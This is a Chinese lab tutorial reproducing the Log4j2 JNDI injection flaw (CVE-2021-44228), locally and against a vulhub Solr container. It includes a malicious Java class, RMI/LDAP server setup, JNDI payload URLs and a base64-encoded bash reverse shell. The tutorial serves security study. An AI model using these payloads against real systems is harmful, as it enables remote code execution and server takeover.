一、基础知识
漏洞介绍:
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2 是 Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。
Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了${sys:my.property},那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
在某些情况下,攻击者可以通过构造带有 ${} 关键标识符的日志消息来触发 log4j2 的 lookup 函数,从而执行任意代码。
JNDI注入主要通过LDAP或RMI服务实现,两种利用方式类似。大致的流程就是程序通过 JNDI 的 LDAP 或 RMI 服务执行了 lookup 方法,执行远程 class 文件中的代码,成功利用此漏洞可以在目标服务器上执行任意代码。
什么是JDNI?
JNDI即Java Naming and Directory Interface(JAVA命名和目录接口),它提供一个目录系统,并将服务名称与对象关联起来,从而使得开发人员在开发过程中可以使用名称来访问对象。
简单粗暴理解:有一个类似于字典的数据源,你可以通过JNDI接口,传一个name进去,就能获取到对象了。
那不同的数据源肯定有不同的查找方式,所以JNDI也只是一个上层封装,在它下面也支持很多种具体的数据源。
JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA。
什么LDAP?
LDAP 即 Lightweight Directory Access Protocol(轻量级目录访问协议),目录是一个为查询、浏览和搜索而优化的专业分布式数据库,它呈树状结构组织数据,就好像Linux/Unix系统中的文件目录一样。简单的理解为:有一个类似于字典的数据源,你可以通过LDAP协议,传一个name进去,就能获取到数据。
攻击者可以通过构造特殊的LDAP请求,在请求中包含恶意的Java代码,当服务器接收到请求并解析时,恶意代码就会被执行。
什么RMI?
RMI 即 Remote Method Invoke(远程方法调用),是Java中的一种远程调用机制,可以在不同的JVM之间实现Java对象之间的交互和通信。攻击者可以通过构造恶意的RMI请求,向受漏洞影响的服务器发送请求并执行恶意代码。(两种利用方式都差不多)
需要注意:
JDK 11.0.1、8u191、7u201、6u211 以上的版本中默认不支持LDAP协议,com.sun.jndi.ldap.object.trustURLCodebase 属性的默认值被调整为false。也就是默认不允许从远程服务器上加载 Reference 的工厂类!(设为true 可以在高版本jdk触发漏洞)
JDK 6u132、JDK 7u122、JDK 8u121 以上的版本中默认不支持RMI协议,com.sun.jndi.rmi.registry.trustURLCodebase/com.sun.jndi.cosnaming.trustURLCodebase 这两个属性默认为 false。也就是默认不允许从远程服务器上加载 Reference 的工厂类!
注意:在 jdk 8u221以上版本利用 RMI 需要把 com.sun.jndi.rmi.registry.trustURLCodebase 和 com.sun.jndi.ldap.object.trustURLCodebase 设为true 可以在高版本jdk触发漏洞,(是不是感觉不对劲,原因看这篇文章:链接)
二、漏洞原理:
有了以上的基础,再来理解这个漏洞就很容易了。
假如某一个Java程序中,将浏览器的类型记录到了日志中:
StringuserAgent = request.getHeader("User-Agent");
logger.info(userAgent);
网络安全中有一个准则:不要信任用户输入的任何信息。这其中,User-Agent就属于外界输入的信息,而不是自己程序里定义出来的。只要是外界输入的,就有可能存在恶意的内容。
假如有人发来了一个HTTP请求,他的User-Agent是这样一个字符串:
${
jndi:ldap://127.0.0.1/exploit}
接下来,log4j2将会对这行要输出的字符串进行解析。
首先,它发现了字符串中有 ${},知道这个里面包裹的内容是要单独处理的。
进一步解析,发现是JNDI扩展内容。
再进一步解析,发现了是LDAP协议,LDAP服务器在127.0.0.1,要查找的key是exploit。
最后,调用具体负责LDAP的模块去请求对应的数据。
如果只是请求普通的数据,那也没什么,但问题就出在还可以请求Java对象!
Java对象一般只存在于内存中,但也可以通过序列化的方式将其存储到文件中,或者通过网络传输。
如果是自己定义的序列化方式也还好,但更危险的在于:JNDI还支持一个叫命名引用(Naming References)的方式,可以通过远程下载一个class文件,然后下载后加载起来构建对象。
PS:有时候Java对象比较大,直接通过LDAP这些存储不方便,就整了个类似于二次跳转的意思,不直接返回对象内容,而是告诉你对象在哪个class里,让你去那里找。
注意,这里就是核心问题了:JNDI可以远程下载class文件来构建对象!!!
危险在哪里?
如果远程下载的URL指向的是一个黑客的服务器,并且下载的class文件里面藏有恶意代码,那不就完犊子了吗?
这就是鼎鼎大名的JNDI注入攻击!
注:此段引用这位大佬的文章:https://baijiahao.baidu.com/s?id=1718842142014280135&wfr=spider&for=pc
三、影响版本
- Apache Log4j 2.0-2.14.1
- Apache Log4j 1.2和Log4j 1.2.x系列不受影响
- Apache Log4j 2.15.0及以上版本已修复此漏洞
四、本地复现
RMI复现:
由于 RMI 服务实现比较简单,这里先使用 RMI 服务进行复现。
JDK版本:jdk1.8.0_241
首先创建 RMI 服务类,Rmiserver.java:
import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;
public class Rmiserver {
public static void main(String[] args) throws Exception {
Registry registry = LocateRegistry.createRegistry(1234);
Reference reference = new Reference("Hello", "Hello", "http://127.0.0.1:80/");
ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
registry.bind("obj", referenceWrapper);
}
}
编写漏洞利用类 Hello.java:
import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;
public class Hello implements ObjectFactory {
@Override
public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) throws Exception {
System.out.println("Hello");
Runtime.getRuntime().exec("calc");
return null;
}
}
功能是弹出 win 上的计算器,编写完执行代码:
javac Hello.java
得到 Hello.class 文件,把它放在黑客自己的服务器上(这里我就放在本地了),访问 Web 服务可以直接访问到。
也就是上面代码这里指定的IP
使用的 Apache web服务。
然后新建 Maven 项目,编写 Log4j 类,Log4jTest.java:
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4jTest {
public static void main(String[] args) {
System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase", "true");//u121,java超过这个版本要设置参数
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");//u221,java超过这个版本要设置参数
Logger logger = LogManager.getLogger();
logger.error("${jndi:rmi://127.0.0.1:1234/obj}");
}
}
其中 pom.xml log4j的引用如下
<dependencies>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
</dependencies>
先启动 RMI 服务,在执行Log4j Test
计算器弹出成功,本地复现完成!
LDAP复现:
JDK版本同上。
LDAP服务本地搭建比较麻烦,这里直接用 marshalsec 的 LDAP服务:项目链接。下载后需要自己编译,编译需要maven环境,进入到 marshalsec 文件夹输入如下命令:
mvn clean package -DskipTests
当查看到绿色的SUCCESS时,即成功编译。在 target 目录下使用编译好的jar包开启一个恶意的ldap服务:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:80/#Hello" 1234
其中 http://127.0.0.1:80/#Hello 是恶意 class 文件的访问地址,1234 即 ldap 服务的访问端口。(这里的 ldap 服务和恶意类都在本地搭建,实际这两个应该在攻击者服务器上)
恶意class文件和前面的 Hello 文件相同,漏洞类如下:
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4jTest {
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");//超过8u191需要设置
Logger logger = LogManager.getLogger();
logger.error("${jndi:ldap://127.0.0.1:1234/Hello}");
}
}
运行 Log4jTest :
可以看到 ldap 接收到了请求并返回了恶意类。
成功弹出。
五、docker实例复现
这里使用 vuluhub 靶场的 docker 进行漏洞复现。
Apache Log4j2 不是一个特定的Web服务,而仅仅是一个第三方库,我们可以通过找到一些使用了这个库的应用来复现这个漏洞,比如Apache Solr。执行如下命令启动一个Apache Solr 8.11.0,其依赖了Log4j 2.14.1
vuluhub 靶场下载好后,首先进入 CVE-2021-44228 目录下
docker-compose up -d //靶场的编译和运行
docker ps //查看docker环境是否启动成功
环境开启后,访问8983端口即可查看到Apache Solr的后台页面:
这个靶场只支持 ldap 服务,所以只能用 ldap 来访问。
DNSlog测试:网站链接
在DNSlog平台请求一个dns域名:
访问下面 Payload 即可利用该漏洞。
http://192.168.50.131:8983/solr/admin/cores?action=${jndi:ldap://3iboge.dnslog.cn}
在DNS网站得到记录,说明存在 Log4j 漏洞!
也可以获取 java 版本信息,访问
http://192.168.50.131:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.rfk88l.dnslog.cn}
反弹shell:
通过两种方式来复现。
方式一:
通过 JNDIExploit 工具来反弹shell(下载链接)下载完成后需要进行编译,进入文件目录后执行:
mvn clean package -DskipTests
在 target 目录中开启服务
java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.50.1
- -i 指定开启服务的IP,服务我是在本地开启的。
注意:这里开启服务的 jdk 版本是 1.8 的,高版本的可能会运行不了。
然后开启监听
构造如下命令:
http://192.168.50.131:8983/solr/admin/cores?action=${jndi:ldap://192.168.50.1:1389/Basic/ReverseShell/192.168.50.1/2333}
- ReverseShell 即反弹shell,后面跟接收 shell 的IP,这里我接收 shell 的IP也是在本地。这个工具还有很多其它的功能,详细可以看上面的链接。
成功反弹shell
方式二:
这里使用另一位大佬开发的EXP,下载链接 下载后不需要编译,在tools目录下通过下面命令使用:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "编码后的bash反弹shell命令" -A “监听的IP地址”
反弹 shell 需要先构造payload:
bash -i >& /dev/tcp/192.168.50.131/2333 0>&1
然后将这个 payload 进行base64加密
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEzMS8yMzMzIDA+JjE=
调整成如下格式
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjUwLjEzMS8yMzMzIDA+JjE=}|{base64,-d}|{bash,-i}" -A 192.168.50.1
- -A 192.168.50.1 即指定开启服务的IP,这里就是我本地的IP。
可以通过在线工具帮助生成命令,工具链接
执行上述命令
可以看到,根据 jdk 版本生成了 rmi 和 ldap 服务的不同利用代码。
先在 192.168.20.131 开启监听,然后根据靶场的版本是jdk1.8的,执行下面url:
http://192.168.50.131:8983/solr/admin/cores?action=${
jndi:ldap://192.168.50.1:1389/bvqld7}
成功得到 shell!
